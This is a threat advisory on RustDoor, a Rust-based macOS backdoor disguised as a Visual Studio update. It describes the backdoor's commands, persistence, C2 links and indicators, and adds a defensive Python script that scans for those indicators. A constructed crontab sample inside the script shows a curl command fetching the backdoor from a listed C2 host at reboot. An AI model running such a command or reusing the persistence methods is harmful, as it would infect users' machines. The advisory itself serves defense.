Severity
High
Analysis Summary
A novel Rust-based backdoor, tracked as RustDoor, is being distributed to macOS users disguised as a Visual Studio update and gives attackers backdoor access to infected devices. It has been observed using infrastructure linked to the well-known ALPHV/BlackCat ransomware gang. The campaign was first observed in November 2023 and is still ongoing, spreading newer variants of the malware.
Because RustDoor is written in Rust, it runs on both Intel (x86_64) and Apple Silicon (ARM) architectures. While analyzing the malware, researchers found that it communicated with at least four command-and-control (C2) servers. Threat intelligence data showed that three of these C2 servers had previously been used in ransomware attacks by an ALPHV/BlackCat affiliate. However, this evidence alone is not enough to attribute the use of RustDoor to a particular threat actor: it has recently become common for different threat actors to reuse the same servers, since they have less freedom in choosing infrastructure for illegal activity.
RustDoor is propagated primarily as an updater for Visual Studio for Mac, Microsoft’s integrated development environment (IDE) for macOS, which is scheduled to be discontinued on August 31, 2024. The backdoor is distributed under many names, such as ‘VisualStudioUpdater’, ‘VisualStudioUpdater_Patch’, ‘VisualStudioUpdating’, ‘zshrc2’, ‘Previewers’, ‘DO_NOT_RUN_ChromeUpdates’, and ‘visualstudioupdate’. According to security analysts, the malware has been actively distributed while going undetected for at least three months.
At least three versions of the malware have been discovered so far. They are distributed as FAT binaries containing Mach-O files for both x86_64 Intel and ARM architectures, but are not packaged in the usual parent containers such as Disk Images or Application Bundles. This unusual distribution method is believed to reduce the campaign’s digital footprint and make it less likely that security products flag the malware as suspicious.
The backdoor offers many capabilities, including commands to control the infected device and exfiltrate data, and it achieves persistence by modifying files on the system. Once a system is compromised, the malware connects to its C2 servers using specific endpoints for registration, task execution, and data exfiltration. The commands supported by RustDoor are as follows:
- ps: Lists running processes.
- shell: Executes arbitrary shell commands.
- cd: Changes the current directory to navigate through the file system.
- mkdir: Creates a new directory.
- rm: Deletes files.
- rmdir: Deletes directories.
- sleep: Pauses execution for a set time.
- upload: Sends files to a remote server.
- botkill: Terminates other malware processes.
- dialog: Displays prompts or messages to the user.
- taskkill: Ends specified processes.
- download: Retrieves files from a remote server.
The malware uses LaunchAgents and cron jobs to schedule its execution at set times or at user login so that it survives system reboots. It also modifies the ~/.zshrc file so that it runs in every new terminal session, and adds itself to the Dock using system commands, helping it blend in with legitimate user activity and applications. The latest variant of the backdoor was first seen on November 30 and contains a complex JSON configuration and an embedded AppleScript used for exfiltrating files with particular extensions.
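A defender-side hunt for the persistence hooks described above (~/.zshrc edits, crontab entries and LaunchAgent plists), written as an added example; it is not code from the advisory or from the researchers. The binary names and hosts are those quoted on this page, the sample file contents are constructed, and the function names are my own.

```python
import plistlib
import re

# Binary names and hosts quoted in the advisory above (assumed complete for this example).
RUSTDOOR_NAMES = [
    "VisualStudioUpdater", "VisualStudioUpdater_Patch", "VisualStudioUpdating",
    "zshrc2", "Previewers", "DO_NOT_RUN_ChromeUpdates", "visualstudioupdate",
]
RUSTDOOR_HOSTS = [
    "maconlineoffice.com", "serviceicloud.com", "sarkerrentacars.com",
    "turkishfurniture.blog", "linksammosupply.com",
]
NAME_RE = re.compile("|".join(map(re.escape, RUSTDOOR_NAMES)), re.IGNORECASE)
HOST_RE = re.compile("|".join(map(re.escape, RUSTDOOR_HOSTS)), re.IGNORECASE)


def classify(text):
    """Indicator categories present in one line or argument; an empty list means clean."""
    reasons = []
    if NAME_RE.search(text):
        reasons.append("binary-name")
    if HOST_RE.search(text):
        reasons.append("c2-host")
    return reasons


def scan_lines(source, text):
    """Hunt a ~/.zshrc or crontab body; returns one (source, line_no, reasons) per hit."""
    return [(source, no, classify(line)) for no, line in enumerate(text.splitlines(), 1)
            if classify(line)]


def scan_launch_agent(source, plist_bytes):
    """Hunt a LaunchAgent plist: flag Program/ProgramArguments that hit an indicator."""
    plist = plistlib.loads(plist_bytes)
    args = [plist.get("Program", "")] + list(plist.get("ProgramArguments", []))
    return [(source, arg, classify(arg)) for arg in args if classify(arg)]


# Constructed samples (not real artifacts) showing what each hook looks like when planted.
SAMPLE_ZSHRC = "export PATH=$HOME/bin:$PATH\n/Users/demo/Library/VisualStudioUpdater &\n"
SAMPLE_CRONTAB = "# constructed\n@reboot curl -s http://linksammosupply.com/zshrc2 -o $HOME/zshrc2\n"
SAMPLE_AGENT = (b'<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>'
                b"<key>Label</key><string>com.apple.previewers</string>"
                b"<key>ProgramArguments</key><array><string>/Users/demo/Previewers</string></array>"
                b"<key>RunAtLoad</key><true/></dict></plist>")

if __name__ == "__main__":
    for hit in (scan_lines("~/.zshrc", SAMPLE_ZSHRC) + scan_lines("crontab", SAMPLE_CRONTAB)
                + scan_launch_agent("com.apple.previewers.plist", SAMPLE_AGENT)):
        print(hit)
```

On a real host, feed it the contents of ~/.zshrc, `crontab -l`, and each plist under ~/Library/LaunchAgents; every hit still needs triage, since a name match alone is not proof of infection.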
Impact
- Data Exfiltration
- Unauthorized Access
- Exposure to Sensitive Data
Indicators of Compromise
Domain Name
- maconlineoffice.com
- serviceicloud.com
URL
- https://sarkerrentacars.com/zshrc
- https://turkishfurniture.blog/Previewers
- http://linksammosupply.com/zshrc2
- http://linksammosupply.com/VisualStudioUpdaterLs2
- http://linksammosupply.com/VisualStudioUpdater
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment using your respective security controls.
- Be vigilant when downloading software and double-check the URL to see if it is legitimate.
- Never download software from untrusted sources.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Enable antivirus and anti-malware software and update signature definitions on time. Using multi-layered protection is necessary to secure vulnerable assets.
- Along with network and system hardening, code hardening should be implemented within the organization so that its websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed code.
- Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
- Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
- Develop and regularly update an incident response plan that outlines the steps to take in case of a security breach. Test the plan through simulations to ensure its effectiveness.